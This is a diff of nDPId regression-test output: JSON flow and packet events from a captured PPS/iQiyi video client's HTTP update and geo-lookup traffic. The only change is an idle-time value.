-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1467353190040,"pkt":"TF4M6gNlABxCjnAxCABFAADGLkBAAIAGTxPAqHMI3xpqE8VLAFDaxGl\/7FKS9VAYQTcFigAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkaGVscGVyLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZEhlbHBlcl9ydW54eA0KSG9zdDogc3RhdGljLnFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQo="} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}} 
-01802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1467353190044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1063,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1063,"pkt_l4_len":1029,"thread_ts_msec":1467353190044,"pkt":"ABxCjnAxTF4M6gNlCABFAAQZtrxAADgGC0TfGmoTwKhzCABQxUvsUpL12sRqHVAYAB9YnAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogNjY3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjMwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQpjb3VudD02DQpjMD1DaGVja0NsaWVudA0KYzE9UVlBZ2VudA0KYzI9bWFzZmxhZw0KYzM9bWFzYXV0bw0KYzQ9bWFzYmxvZw0KYzU9Q29va2llQ2xlYXINCltEb3dubG9hZGVyXQ0KQ2hlY2tDbGllbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9DaGVja0NsaWVudC56aXA7U3RhcnQ7OTdEQzFBMTJCQzMyMkNERjRCQjE5MjNDNEVGMTRFMUINClFZQWdlbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9RWUFnZW50LnppcDtTdGFydEFnZW50OzRDRDQxOTkyNjI5ODBBRjY5RDA3OThEREFBNDJGM0M5DQptYXNmbGFnPWh0dHA6Ly9tYmRhcHAuaXFpeWkuY29tL2ovb3QvbWFzZmxhZy56aXA7U3RhcnQ7RTNGRDlCMjEzMEFCQTIxNTc1QjRGNDk2RDg5Q0FGOTINCm1hc2F1dG89aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9tYXNhdXRvLnppcDtTdGFydDtEMTQ3M0E5Mjg2MjBENjZGMzM0QjI4RUYxRjk0QjA3OA0KbWFzYmxvZz1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L21hc2Jsb2cuemlwO1N0YXJ0O0JGRENCNTM1QzNFRUIwMkZEREI5NjFEMDVBNTIzQjI2DQpDb29raWVDbGVhcj1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L0Nvb2tpZUNsZWFyLnppcDtTdGFydDtGMzlBRDlFOTgzREJCMzA5MkYxQzNDNDIwRjJBNDgyQQ=="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190110,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kJVAADMGqbHKbA7bwKhzCABQxUpzStvEq5YvP1AYADaqqAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1467353190168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190168,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPRAADMGJVPKbA7bwKhzCABQxHdtLPipvNGQx1AYAMQhYwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1467353190040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1467353190040,"pkt":"TF4M6gNlABxCjnAxCABFAADGLkBAAIAGTxPAqHMI3xpqE8VLAFDaxGl\/7FKS9VAYQTcFigAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkaGVscGVyLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZEhlbHBlcl9ydW54eA0KSG9zdDogc3RhdGljLnFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQo="} 
+00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}} +01802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1467353190044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1063,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1063,"pkt_l4_len":1029,"thread_ts_msec":1467353190044,"pkt":"ABxCjnAxTF4M6gNlCABFAAQZtrxAADgGC0TfGmoTwKhzCABQxUvsUpL12sRqHVAYAB9YnAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogNjY3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjMwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQpjb3VudD02DQpjMD1DaGVja0NsaWVudA0KYzE9UVlBZ2VudA0KYzI9bWFzZmxhZw0KYzM9bWFzYXV0bw0KYzQ9bWFzYmxvZw0KYzU9Q29va2llQ2xlYXINCltEb3dubG9hZGVyXQ0KQ2hlY2tDbGllbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9DaGVja0NsaWVudC56aXA7U3RhcnQ7OTdEQzFBMTJCQzMyMkNERjRCQjE5MjNDNEVGMTRFM
UINClFZQWdlbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9RWUFnZW50LnppcDtTdGFydEFnZW50OzRDRDQxOTkyNjI5ODBBRjY5RDA3OThEREFBNDJGM0M5DQptYXNmbGFnPWh0dHA6Ly9tYmRhcHAuaXFpeWkuY29tL2ovb3QvbWFzZmxhZy56aXA7U3RhcnQ7RTNGRDlCMjEzMEFCQTIxNTc1QjRGNDk2RDg5Q0FGOTINCm1hc2F1dG89aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9tYXNhdXRvLnppcDtTdGFydDtEMTQ3M0E5Mjg2MjBENjZGMzM0QjI4RUYxRjk0QjA3OA0KbWFzYmxvZz1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L21hc2Jsb2cuemlwO1N0YXJ0O0JGRENCNTM1QzNFRUIwMkZEREI5NjFEMDVBNTIzQjI2DQpDb29raWVDbGVhcj1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L0Nvb2tpZUNsZWFyLnppcDtTdGFydDtGMzlBRDlFOTgzREJCMzA5MkYxQzNDNDIwRjJBNDgyQQ=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1467353190110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190110,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kJVAADMGqbHKbA7bwKhzCABQxUpzStvEq5YvP1AYADaqqAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1467353190168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190168,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPRAADMGJVPKbA7bwKhzCABQxHdtLPipvNGQx1AYAMQhYwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1405,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1467353190178,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353190178,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAlEAAAERAT3AqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190235,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPVAADMGJVLKbA7bwKhzCABQxHdtLPk6vNGSM1AYANYfVAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353190634,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LnBAAIAGTvHAqHMI3xpqE8VMAFCjClS\/APxWfFAYQTf8ogAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL1FZQWdlbnQuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IFFZQWdlbnRfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} -00940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1467353190638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"thread_ts_msec":1467353190638,"pkt":"ABxCjnAxTF4M6gNlCABFAAGWcOxAADgGU5ffGmoTwKhzCABQxUwA\/FZ8owpVT1AYAB8JQAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMjUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MzA6MDcgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjE5DQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbUVlBZ2VudF0NCnY9MA0KcD0xMDANCmU9"} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1467353190892,"pkt":"TF4M6gNlABxCjnAxCABFAACVLoRAAIAGUpzAqHMIaibba8VNAFAdei0\/k1iI9FAYQTd0xwAAR0VUIC9jaXR5anNvbiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVlBZ2VudF9ydW54eA0KSG9zdDogaXBsb2NhdGlvbi5nZW8ucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} 
-01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":497,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":497,"pkt_l4_len":463,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAHjK+5AADIGoeRqJttrwKhzCABQxU2TWIj0HXotrFAYAOXEmAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGNoYXJzZXQ9dXRmLTgNCg0KZjINCnZhciByZXR1cm5JcENpdHkgPXsiY29kZSI6IkEwMDAwMCIsICJkYXRhIjogeyJpcCI6IjExOC4xNjMuOC45MCIsICJpc3AiOiLkuK3ljY7nlLXkv6EiLCAiY291bnRyeSI6IuS4reWbveWkp+mZhiIsICJwcm92aW5jZSI6IuWPsOa5viIsICJjaXR5IjoiTm9uZSIsICJpc3BfaWQiOjY5LCAiY291bnRyeV9pZCI6NDgsICJwcm92aW5jZV9pZCI6MjI4LCAiY2l0eV9pZCI6MjI4MDAwLCAibG9jYXRpb25faWQiOjY5MjI4MDAwfX0KDQo="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":25,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAAtK+9AADIGo5lqJttrwKhzCABQxU2TWIqvHXotrFAYAOXCuQAAMA0KDQoA"} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191500,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9BAAIAGTZDAqHMI3xpqFMZOAFCUEYDiYZCIJlAYQTcJ9QAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2ZsYWcuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2ZsYWdfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} 